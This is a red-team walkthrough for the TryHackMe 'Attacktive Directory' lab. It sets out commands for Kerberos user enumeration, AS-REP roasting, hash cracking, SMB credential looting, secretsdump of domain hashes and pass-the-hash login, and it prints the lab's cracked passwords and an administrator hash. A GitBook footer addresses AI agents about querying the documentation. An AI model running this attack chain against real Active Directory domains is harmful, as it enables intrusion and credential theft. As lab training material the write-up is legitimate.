> For the complete documentation index, see [llms.txt](https://jeffgthompsons-organization.gitbook.io/red-team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/attacktive-directory.md). # Attacktive Directory **Room Link:** ## Walkthrough ### Setup #### Installing Impacket ``` git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket pip3 install -r /opt/impacket/requirements.txt cd /opt/impacket/ && python3 ./setup.py install ``` #### Installing Bloodhound and Neo4j ``` apt install bloodhound neo4j ``` #### Installing kerbrute ``` git clone https://github.com/ropnop/kerbrute.git cd kerbrute/ make all ``` ### username and password custom lists for this machine ``` wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt ``` ### Welcome to Attacktive Directory #### **Initial Scan** ``` nmap -A $VICTIM ```

#### Scan all ports ``` nmap -sV -sT -O -p 1-65535 $VICTIM ```

### netbios-ssn port 139 & microsoft-ds port 445 ``` enum4linux $VICTIM ``` The NetBIOS-Domain Name of the machine

### Enumerating Users via Kerberos port 88 ``` kerbrute/dist/kerbrute_linux_386 userenum --dc=$VICTIM -d=spookysec.local. userlist.txt ```

### Abusing Kerberos **validusers.txt** ``` james svc-admin robin darkstar administrator backup paradox ``` svc-admin allows us to get a ticket without a password. The hash type is Kerberos 5 etype 23 AS-REP. ``` python3.9 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile validusers.txt -dc-ip $VICTIM spookysec.local/ ```

Cracking the hash we can see the password is management2005 ``` hashcat -m18200 hash.txt passwordlist.txt hashcat -m18200 hash.txt passwordlist.txt --show ```

### Back to the Basics ### netbios-ssn port 139 & microsoft-ds port 445 ``` smbclient -L $VICTIM -U "svc-admin" Enter WORKGROUP\svc-admin's password: management2005 ```

``` smbclient \\\\$VICTIM\\backup -U "svc-admin" smb: \> dir smb: \> get backup_credentials.txt ```

Its a base64 encoded username and password. :backup2517860 ``` cat backup_credentials.txt echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d ```

### Elevating Privileges within the Domain - **WinRM** port5985 ``` python3 /usr/local/bin/secretsdump.py spookysec.local/backup:backup2517860@$VICTIM > allhashes.txt cat allhashes.txt | awk -F : '{print $1 ":" $3}' | sort | uniq ``` ### Flag Submission PaneLogin as Administrator ``` evil-winrm -i $VICTIM -u Administrator -H 0e0363213e37b94221497260b0bcb4fc ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/attacktive-directory.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.